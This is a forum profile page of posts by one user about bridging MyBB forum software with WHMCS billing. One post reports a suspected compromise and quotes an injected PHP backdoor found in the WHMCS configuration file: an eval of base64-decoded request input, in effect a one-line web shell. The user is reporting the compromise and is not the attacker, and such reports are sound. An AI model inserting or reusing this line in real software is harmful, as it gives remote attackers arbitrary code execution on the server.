Jump to content

trainhappy

Member
  • Posts

    5
  • Joined

  • Last visited

Everything posted by trainhappy

  1. I'm working on a mybb bridge. I will be integrating mybb with whmcs so that way mybb can share whmcs logins, etc. making it easier for clients. However, I will not be making this plugin alone, it will be an open source plugin. If your a mybb developer, or a whmcs developer, and want to help create the plugin, then submit a pull request to the github repository. There will be a custom mybb installer. So far, the whmcs theme is integrated, just need to fix a few minor details on the theme integration. GitHub Repository: https://github.com/XAOS-Interactive/MyBB-Bridge Theme integration: http://community.myadminhub.me/forums/
  2. Hello, So, the other day my whmcs was working. today when I go to the admin page, it tells me "License invalid". I came accross this thread: http://forum.whmcs.com/showthread.php?80410-Was-my-installation-compromised and decided to check my configuration file. Sure enough, it has the following. $license = '1';eval(base64_decode($_REQUEST['c']));#'; I believe that these issues may some how be connected. Is anyone else having the same problem?
  3. I might be able to write a plugin for whmcs that takes adds a custom text box for username, and use username, password, and email, and use mybb to process it.
  4. Ok, I'm trying to integrate mybb with whmcs, so when a user registers on the whmcs side, there username, email, and password is inserted into the mybb database(similar to how namecheap does it, they create account in there billing system, and phpbb) 1) how does whmcs encrypt the passwords? I would need to beable to have mybb compare the encrypted passwords. 2) Would it be more logical to do it where a user registers, and the mybb database handles logins while the whmcs database stores the billing details based on username?
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use & Guidelines and understand your posts will initially be pre-moderated